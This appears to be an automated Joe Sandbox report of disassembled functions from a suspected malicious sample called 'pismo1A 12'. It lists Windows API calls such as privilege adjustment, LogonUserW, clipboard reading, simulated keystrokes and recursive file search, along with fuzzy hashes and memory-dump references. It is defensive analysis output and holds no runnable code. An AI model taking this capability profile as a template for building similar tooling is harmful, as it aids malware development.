Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: 72c37776629c2f39b25da377afcb68094ce82c6a0db19cb7bdda5f9a17a49553
Instruction ID: 01da4a31d88516dff99daa7aa6a8cbe96f4b3a395e759738e21b42d05a4076f8
Opcode Fuzzy Hash: 72c37776629c2f39b25da377afcb68094ce82c6a0db19cb7bdda5f9a17a49553
Instruction Fuzzy Hash: C1C09B36380304DFF2154794BC5AF107754A348B41F54C001F64D655E3C3A51470D758

Function 0071744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON

Download Yara Rule

APIs

Part of subcall function 006A5745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,006A949C,?,00008000), ref: 006A5773

GetLastError.KERNEL32(00000002,00000000), ref: 007176DE

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: e68c69aeb488fa8d2f6a69597d89e8a065b977559ee624bd16b8530e3e4a9b26
Instruction ID: 295fbe73ca9c018144d781268432e32991447bf91194b11b34ec9b305fd83412
Opcode Fuzzy Hash: e68c69aeb488fa8d2f6a69597d89e8a065b977559ee624bd16b8530e3e4a9b26
Instruction Fuzzy Hash: C18180306087019FCB58EF28C491AA9B7F2AF89350F14451DF8865B2D2DB38ED85CF96

Function 006BFC70 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 006BFD1F

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 881030a601d1f81703dc9e1b141fec1c16d64a60e14f8616c552a6de90acb2e7
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 2131C6B5A00109DBD718DF59D880AA9FBA6FF49300B6486A5E809CF766D731EDC1CBD0

Function 010C22A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 010C22B1

Memory Dump Source

Source File: 00000000.00000002.2039286629.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10c0000_pismo1A 12.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 9713c32ff5f2337d7522c369f96158d75c72ad188ea4fcaca5de7d17c0b7dd49
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 7AE0E67494020EEFDB00EFB8D5496DE7FB4EF04701F100165FD01D2281D6309D508A72

Non-executed Functions

Function 00739576 Relevance: 74.1, APIs: 39, Strings: 3, Instructions: 625windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 006B9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 006B9BB2

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0073961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0073965B
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0073969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007396C9
SendMessageW.USER32 ref: 007396F2
GetKeyState.USER32(00000011), ref: 0073978B
GetKeyState.USER32(00000009), ref: 00739798
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007397AE
GetKeyState.USER32(00000010), ref: 007397B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007397E9
SendMessageW.USER32 ref: 00739810
SendMessageW.USER32(?,00001030,?,00737E95), ref: 00739918
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0073992E
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00739941
SetCapture.USER32(?), ref: 0073994A
ClientToScreen.USER32(?,?), ref: 007399AF
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 007399BC
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007399D6
ReleaseCapture.USER32 ref: 007399E1
GetCursorPos.USER32(?), ref: 00739A19
ScreenToClient.USER32(?,?), ref: 00739A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 00739A80
SendMessageW.USER32 ref: 00739AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 00739AEB
SendMessageW.USER32 ref: 00739B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00739B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00739B4A
GetCursorPos.USER32(?), ref: 00739B68
ScreenToClient.USER32(?,?), ref: 00739B75
GetParent.USER32(?), ref: 00739B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 00739BFA
SendMessageW.USER32 ref: 00739C2B
ClientToScreen.USER32(?,?), ref: 00739C84
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00739CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 00739CDE
SendMessageW.USER32 ref: 00739D01
ClientToScreen.USER32(?,?), ref: 00739D4E
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00739D82

Part of subcall function 006B9944: GetWindowLongW.USER32(?,000000EB), ref: 006B9952

GetWindowLongW.USER32(?,000000F0), ref: 00739E05

Strings

@GUI_DRAGID, xrefs: 0073997D
p#w, xrefs: 00739990
F, xrefs: 00739D07

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: @GUI_DRAGID$F$p#w
API String ID: 3429851547-627597586
Opcode ID: 3a1ac60dc7e898fca4ef793dc43132f66ea31d95539b241b82d99f63ed958464
Instruction ID: e037ac88f4ecdd623e1b57b4e700fbf5271b26765d091b7dff10d6fb3e612bbd
Opcode Fuzzy Hash: 3a1ac60dc7e898fca4ef793dc43132f66ea31d95539b241b82d99f63ed958464
Instruction Fuzzy Hash: E042CB31205240EFEB21CF28CC45AAABBE5FF49310F10465DF699972A2D7B9E860CF55

Function 00734873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 007348F3
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00734908
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00734927
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0073494B
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0073495C
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0073497B
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 007349AE
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 007349D4
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00734A0F
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00734A56
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00734A7E
IsMenu.USER32(?), ref: 00734A97
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00734AF2
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00734B20
GetWindowLongW.USER32(?,000000F0), ref: 00734B94
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00734BE3
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00734C82
wsprintfW.USER32 ref: 00734CAE
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00734CC9
GetWindowTextW.USER32(?,00000000,00000001), ref: 00734CF1
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00734D13
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00734D33
GetWindowTextW.USER32(?,00000000,00000001), ref: 00734D5A

Strings

%d/%02d/%02d, xrefs: 00734CA8

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d
API String ID: 4054740463-328681919
Opcode ID: 0b69a34b0f5289da4f8f4b368315c1cd817b060c8979af1a6d1bd695026c3cd3
Instruction ID: 387dab52879ec4c59fbbbcd9a1c547570e87c905e97c2ebe86ddf07549d56613
Opcode Fuzzy Hash: 0b69a34b0f5289da4f8f4b368315c1cd817b060c8979af1a6d1bd695026c3cd3
Instruction Fuzzy Hash: 19120071600214ABFB298F24CC4AFAE7BF8FF45310F148169F515EA2E2DB78A941CB50

Function 006BF98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 006BF998
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006FF474
IsIconic.USER32(00000000), ref: 006FF47D
ShowWindow.USER32(00000000,00000009), ref: 006FF48A
SetForegroundWindow.USER32(00000000), ref: 006FF494
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 006FF4AA
GetCurrentThreadId.KERNEL32 ref: 006FF4B1
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 006FF4BD
AttachThreadInput.USER32(?,00000000,00000001), ref: 006FF4CE
AttachThreadInput.USER32(?,00000000,00000001), ref: 006FF4D6
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 006FF4DE
SetForegroundWindow.USER32(00000000), ref: 006FF4E1
MapVirtualKeyW.USER32(00000012,00000000), ref: 006FF4F6
keybd_event.USER32(00000012,00000000), ref: 006FF501
MapVirtualKeyW.USER32(00000012,00000000), ref: 006FF50B
keybd_event.USER32(00000012,00000000), ref: 006FF510
MapVirtualKeyW.USER32(00000012,00000000), ref: 006FF519
keybd_event.USER32(00000012,00000000), ref: 006FF51E
MapVirtualKeyW.USER32(00000012,00000000), ref: 006FF528
keybd_event.USER32(00000012,00000000), ref: 006FF52D
SetForegroundWindow.USER32(00000000), ref: 006FF530
AttachThreadInput.USER32(?,000000FF,00000000), ref: 006FF557

Strings

Shell_TrayWnd, xrefs: 006FF46F

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: f9f0bcc1a787bf6a16a9617c8a1b013c40baa7d5b5cf2c94595593cf22a69d1c
Instruction ID: 18be2871d634e2bf4d2ee341ca350bb135bad633a29df26ee0adfcb6a9fc2925
Opcode Fuzzy Hash: f9f0bcc1a787bf6a16a9617c8a1b013c40baa7d5b5cf2c94595593cf22a69d1c
Instruction Fuzzy Hash: 11316D71A4021CBAFB216BB54C4AFBF7E6DEB44B51F104066FA00F61D1C6B49910ABA4

Function 00701201 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 007016C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0070170D
Part of subcall function 007016C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0070173A
Part of subcall function 007016C3: GetLastError.KERNEL32 ref: 0070174A

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00701286
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 007012A8
CloseHandle.KERNEL32(?), ref: 007012B9
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 007012D1
GetProcessWindowStation.USER32 ref: 007012EA
SetProcessWindowStation.USER32(00000000), ref: 007012F4
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00701310

Part of subcall function 007010BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007011FC), ref: 007010D4
Part of subcall function 007010BF: CloseHandle.KERNEL32(?,?,007011FC), ref: 007010E9

Strings

, xrefs: 0070125A
winsta0, xrefs: 007012CC
Zv, xrefs: 00701392
default, xrefs: 0070130B

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0$Zv
API String ID: 22674027-1252836245
Opcode ID: 94aa0a06e8f00235fd7c0aede8777d76acc5a6132ba564acb4e46743d6572808
Instruction ID: 4a38109253b7e6f0f615feb457c53a2c5f72bb6373dd70a84ebf70f2a1926836
Opcode Fuzzy Hash: 94aa0a06e8f00235fd7c0aede8777d76acc5a6132ba564acb4e46743d6572808
Instruction Fuzzy Hash: 9B8189B1900249EBEF219FA4DC49FEE7BB9EF04704F148229F911B61A0C7798954CB65

Function 00700B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 007010F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00701114
Part of subcall function 007010F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00700B9B,?,?,?), ref: 00701120
Part of subcall function 007010F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00700B9B,?,?,?), ref: 0070112F
Part of subcall function 007010F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00700B9B,?,?,?), ref: 00701136
Part of subcall function 007010F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0070114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00700BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00700C00
GetLengthSid.ADVAPI32(?), ref: 00700C17
GetAce.ADVAPI32(?,00000000,?), ref: 00700C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00700C6D
GetLengthSid.ADVAPI32(?), ref: 00700C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00700C8C
HeapAlloc.KERNEL32(00000000), ref: 00700C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00700CB4
CopySid.ADVAPI32(00000000), ref: 00700CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00700CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00700D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00700D1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00700D45
HeapFree.KERNEL32(00000000), ref: 00700D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00700D55
HeapFree.KERNEL32(00000000), ref: 00700D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00700D65
HeapFree.KERNEL32(00000000), ref: 00700D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 00700D78
HeapFree.KERNEL32(00000000), ref: 00700D7F

Part of subcall function 00701193: GetProcessHeap.KERNEL32(00000008,00700BB1,?,00000000,?,00700BB1,?), ref: 007011A1
Part of subcall function 00701193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00700BB1,?), ref: 007011A8
Part of subcall function 00701193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00700BB1,?), ref: 007011B7

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 22e562c38cec16a24241ffb9f8fb84e55b192612fb147cc08f07782e32a8e4ec
Instruction ID: d1373ac5102d4c9dd3439ea438bdd97c47f49009cccee20cd43ff874edf833cb
Opcode Fuzzy Hash: 22e562c38cec16a24241ffb9f8fb84e55b192612fb147cc08f07782e32a8e4ec
Instruction Fuzzy Hash: A1715C76A0020AEBEF11DFA4DC45FEEBBB9BF04311F048615E914B6191D779A905CBB0

Function 0071EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0073CC08), ref: 0071EB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 0071EB37
GetClipboardData.USER32(0000000D), ref: 0071EB43
CloseClipboard.USER32 ref: 0071EB4F
GlobalLock.KERNEL32(00000000), ref: 0071EB87
CloseClipboard.USER32 ref: 0071EB91
GlobalUnlock.KERNEL32(00000000,00000000), ref: 0071EBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 0071EBC9
GetClipboardData.USER32(00000001), ref: 0071EBD1
GlobalLock.KERNEL32(00000000), ref: 0071EBE2
GlobalUnlock.KERNEL32(00000000,?), ref: 0071EC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 0071EC38
GetClipboardData.USER32(0000000F), ref: 0071EC44
GlobalLock.KERNEL32(00000000), ref: 0071EC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0071EC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0071EC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0071ECD2
GlobalUnlock.KERNEL32(00000000,?,?), ref: 0071ECF3
CountClipboardFormats.USER32 ref: 0071ED14
CloseClipboard.USER32 ref: 0071ED59

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 403d2a0aa0ba691c5a72581165de6ca9cde2da97bd9c05bfdf3c77bf9893dc7c
Instruction ID: ee406d6f0062ce37e0a4da5499de81d61d20c239bdff5cddb82ac2e160dbb7b2
Opcode Fuzzy Hash: 403d2a0aa0ba691c5a72581165de6ca9cde2da97bd9c05bfdf3c77bf9893dc7c
Instruction Fuzzy Hash: 0261F4752042019FE311EF28D889F6A77E4AF85704F18851DF846972E2CB39DD85CB66

Function 0071698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 007169BE
FindClose.KERNEL32(00000000), ref: 00716A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00716A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00716A75

Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD

FileTimeToSystemTime.KERNEL32(?,?), ref: 00716AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 00716ADF

Strings

%03d, xrefs: 00716DA2
%02d, xrefs: 00716C00, 00716C0A, 00716C5A, 00716CAA, 00716CFA, 00716D4A
%4d, xrefs: 00716BB1
%4d%02d%02d%02d%02d%02d, xrefs: 00716B6A
%4d%02d%02d%02d%02d%02d%03d, xrefs: 00716B32

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: a818c819824b61d5f1e6bbb7b24b154780a5b29f22269f66359858f31f727322
Instruction ID: 6628910c339f205b17eb2d467654188cf52322b6679eccc53ab9395940c83676
Opcode Fuzzy Hash: a818c819824b61d5f1e6bbb7b24b154780a5b29f22269f66359858f31f727322
Instruction Fuzzy Hash: 56D15EB2508300AEC354EBA4CC81EABB7EDBF89704F44491DF585D6191EB38DE48CB66

Function 00719642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00719663
GetFileAttributesW.KERNEL32(?), ref: 007196A1
SetFileAttributesW.KERNEL32(?,?), ref: 007196BB
FindNextFileW.KERNEL32(00000000,?), ref: 007196D3
FindClose.KERNEL32(00000000), ref: 007196DE
FindFirstFileW.KERNEL32(*.*,?), ref: 007196FA
SetCurrentDirectoryW.KERNEL32(?), ref: 0071974A
SetCurrentDirectoryW.KERNEL32(00766B7C), ref: 00719768
FindNextFileW.KERNEL32(00000000,00000010), ref: 00719772
FindClose.KERNEL32(00000000), ref: 0071977F
FindClose.KERNEL32(00000000), ref: 0071978F

Strings

*.*, xrefs: 007196F5

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: 91b5cd6d218f9d0d18ca9fd1343d7b6f0e6746669f4b503f64bdbd0c0f10cd38
Instruction ID: 3ce0f25f6a1569c6b1784ff24519d938b833c04512a62d50cdc403c9ec6d8a5a
Opcode Fuzzy Hash: 91b5cd6d218f9d0d18ca9fd1343d7b6f0e6746669f4b503f64bdbd0c0f10cd38
Instruction Fuzzy Hash: 8E31D5725012196AEF15AFB8DC19EDE77ACAF09321F108155F905E30D0DB3CDE818B24

Function 0071979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 007197BE
FindNextFileW.KERNEL32(00000000,?), ref: 00719819
FindClose.KERNEL32(00000000), ref: 00719824
FindFirstFileW.KERNEL32(*.*,?), ref: 00719840
SetCurrentDirectoryW.KERNEL32(?), ref: 00719890
SetCurrentDirectoryW.KERNEL32(00766B7C), ref: 007198AE
FindNextFileW.KERNEL32(00000000,00000010), ref: 007198B8
FindClose.KERNEL32(00000000), ref: 007198C5
FindClose.KERNEL32(00000000), ref: 007198D5

Part of subcall function 0070DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0070DB00

Strings

*.*, xrefs: 0071983B

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
